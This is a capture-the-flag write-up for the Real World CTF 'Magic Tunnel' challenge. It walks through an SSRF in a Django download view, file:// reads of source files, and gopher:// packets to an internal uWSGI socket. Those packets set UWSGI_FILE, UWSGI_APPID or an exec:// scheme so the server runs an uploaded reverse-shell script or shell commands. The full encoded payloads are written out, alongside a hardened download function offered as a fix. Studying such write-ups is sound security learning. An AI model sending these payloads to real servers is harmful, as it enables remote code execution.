Real World CTF Magic Tunnel Write Up
I did not look at this challenge during the contest. Near the end a teammate spotted the key point, but we could not get the environment running locally and had no time left, so we gave up.
Back to the topic.
Opening the challenge we find a Download feature. A quick test with an arbitrary URL, for example http://www.venenof.com/1.gif :

There is no restriction on the file extension either, which means we can fetch and store arbitrary remote files.
Through the file protocol we can also read arbitrary local files; with file:///proc/mounts we can locate the web directory:

From there we can read the relevant files of the web directory. The content of rwctf/settings.py is as follows:
""" Django settings for rwctf project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os import dj_database_url # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get('SECRET_KEY', 'y5fc9nypwm%x1w^plkld4y#jwgrd)$ys6&!cog^!3=xr5m4#&-') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get('DEBUG', '0') in ('True', 'true', '1', 'TRUE') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'xremote', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'rwctf.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.template.context_processors.media', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 
'rwctf.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': dj_database_url.config(conn_max_age=600, default='sqlite:////tmp/db.sqlite3') } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript/">JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') LOG_PATH = os.environ.get('LOG_PATH', os.path.join(BASE_DIR, 'error.log')) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'standard': { 'format': '[%(asctime)s] - [%(levelname)s] - [%(pathname)s:%(lineno)d]- %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S' }, }, 'handlers': { 'console': { 'level': 'WARNING', 'class': 'logging.StreamHandler', 'formatter': 'standard', 'filters': ['discard_not_found_error'], } }, 'loggers': { '': { 'handlers': ['console'], 'level': 'WARNING' }, 'django': { 'handlers': ['console'], 'level': 'WARNING' }, }, 'filters': { 'discard_not_found_error': { '()': 'django.utils.log.CallbackFilter', 'callback': lambda record: hasattr(record, 'status_code') and record.status_code != 404, } }, }
Reading urls.py:
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('', include('xremote.urls', namespace='xremote')),
    path('admin/', admin.site.urls),
]
Finally, reading xremote/views.py:
import os
import pycurl
import uuid

from django.utils import dateformat, timezone
from django.shortcuts import render
from django.views import generic
from django.db import transaction
from django.urls import reverse_lazy
from django.conf import settings
from django.http import HttpResponseRedirect

from . import forms
from . import models


class ImgsMixin(object):
    def get_context_data(self, **kwargs):
        kwargs['imgs'] = self.request.session.get('imgs', [])
        return super().get_context_data(**kwargs)


class DownloadRemote(ImgsMixin, generic.FormView):
    form_class = forms.ImageForm
    template_name = 'index.html'
    success_url = reverse_lazy('xremote:download')

    def download(self, url):
        # The user-supplied URL goes to libcurl unchanged: no scheme allowlist,
        # so file://, gopher:// and every other protocol libcurl speaks is accepted.
        try:
            c = pycurl.Curl()
            c.setopt(pycurl.URL, url)
            c.setopt(pycurl.TIMEOUT, 10)
            response = c.perform_rb()
            c.close()
        except pycurl.error:
            response = b''
        return response

    def generate_path(self):
        # Downloaded bytes are stored under MEDIA_ROOT/Y/m/d/<uuid4>, with no
        # extension or content check, and the resulting path is shown to the user.
        path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d'))
        if not os.path.exists(path):
            os.makedirs(path, 0o755)
        return os.path.join(path, str(uuid.uuid4()))

    @transaction.atomic
    def form_valid(self, form):
        url = form.cleaned_data['url']
        response = self.download(url)
        path = self.generate_path()
        if response:
            with open(path, 'wb') as f:
                f.write(response)
            url = path[len(settings.MEDIA_ROOT)+1:]
            models.Image.objects.create(path=url)
            if 'imgs' not in self.request.session:
                self.request.session['imgs'] = []
            self.request.session['imgs'].append(url)
            self.request.session.modified = True
        return HttpResponseRedirect(self.get_success_url())
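The download() method above hands the user's URL to libcurl with no restriction on scheme or destination, which is what makes the file:// read and, later in this write-up, the gopher:// hop to uwsgi possible. A hardened replacement, added here as an example (not the challenge author's code): the validator is pure Python with an injectable resolver, and hardened_download assumes pycurl is installed as it is in the challenge.

```python
import ipaddress
import socket
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(addr) -> bool:
    """True only for globally routable unicast addresses (no loopback, RFC 1918, link-local...)."""
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_download_url(url: str, resolve=socket.gethostbyname) -> Optional[str]:
    """Return None when the URL may be fetched, otherwise the reason it was refused.

    `resolve` is injectable so the policy can be tested without DNS."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:   # urlsplit lowercases the scheme
        return "scheme not allowed"
    if not parts.hostname:
        return "missing host"
    try:
        addr = ipaddress.ip_address(resolve(parts.hostname))
    except (socket.gaierror, ValueError):
        return "unresolvable host"
    if not is_public_address(addr):
        return "host resolves to a non-public address"
    return None


def hardened_download(url: str) -> bytes:
    """Drop-in for DownloadRemote.download: validate first, then pin libcurl to
    http(s) for the initial request and for any redirect it might follow."""
    import pycurl  # assumed available, as in the challenge's own view
    if validate_download_url(url) is not None:
        return b""
    c = pycurl.Curl()
    try:
        c.setopt(pycurl.URL, url)
        c.setopt(pycurl.PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
        c.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
        c.setopt(pycurl.TIMEOUT, 10)
        return c.perform_rb()
    except pycurl.error:
        return b""
    finally:
        c.close()
```

The resolve-then-fetch sequence still leaves a DNS rebinding window; closing it means connecting to the address that was checked (for example via pycurl.RESOLVE) rather than letting libcurl resolve the name a second time.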
Here we notice that settings.py refers to uwsgi, and server.sh shows how uwsgi is deployed:
#!/bin/sh
BASE_DIR=$(pwd)
./manage.py collectstatic --no-input
./manage.py migrate --no-input
exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1
uwsgi supports the magic variable UWSGI_FILE, which loads the specified file as a new dynamic application. If that file is one we control, the result is RCE.
Back to the beginning: we already know the site will download arbitrary files. Testing locally, with the environment set up following the reference article, the magic variable loads and executes the file automatically, and it runs successfully:

Capture the traffic locally:
tcpdump -i lo port 8001 -w dump.pcap
or simply use nc.
We saw earlier that the download feature is in fact an SSRF, so we can use gopher to reach uwsgi on the internal network and have it load and execute our own script dynamically. Local test:

So, back in the challenge: first remotely download a Python reverse-shell script and note the file name it was stored under, e.g. /usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef , then change the gopher data to:
gopher://127.0.0.1:8000/_%00u%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0035776%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0A%00UWSGI_FILE%09%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A
But note the form definition:
from django import forms
from . import models


class ImageForm(forms.Form):
    url = forms.CharField(max_length=512, widget=forms.URLInput())
The length is limited to 512 bytes, which the payload above certainly exceeds, so we have to trim it ourselves. After repeated attempts I found that the ASCII value of the second character is actually the length of the whole packet, so I modified the payload locally as follows:
<?php
echo urlencode(chr(strlen(urldecode('%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A'))));
?>
gopher://127.0.0.1:8000/_%00%E4%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A
Locally this executes, but on the challenge it does not; I guessed the cause was the challenge's environment configuration. Going through the documentation, I found the magic variable UWSGI_APPID, whose purpose is to bypass SCRIPT_NAME and VirtualHosting so that the user can choose the mount point without restriction; if it is not found in the internal application list, it is loaded. So the configuration can be modified like this:
server {
    server_name server001;
    location / {
        include uwsgi_params;
        uwsgi_param UWSGI_APPID myfunnyapp;
        uwsgi_param UWSGI_FILE /var/www/app1.py;
    }
}
Local capture:
%00%C6%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0036452%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A
Modified payload:
gopher://127.0.0.1:8000/_%00%FA%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/04/7683a121-2d76-4a03-b35c-532bbe7f1483%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A
Then catch the reverse shell :-D
After the contest I found that someone had already published an exploitation method back in January: because exec is among uWSGI's default schemes, direct RCE is possible. That author also provided a script, so the raw packet can be captured directly without even setting up a local environment, for example:
%00%DF%00%00%0E%00REQUEST_METHOD%03%00GET%09%00HTTP_HOST%09%00127.0.0.1%09%00PATH_INFO%08%00%2Ftestapp%0B%00SERVER_NAME%09%00127.0.0.1%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00QUERY_STRING%00%00%0B%00SCRIPT_NAME%08%00%2Ftestapp%0A%00UWSGI_FILE%20%00exec%3A%2F%2Ftouch%20%2Ftmp%2Fccc%3B%20echo%20test%0B%00REQUEST_URI%08%00%2Ftestapp
Thanks to ph for the docker setup; I hit several problems during reproduction, which really was real world.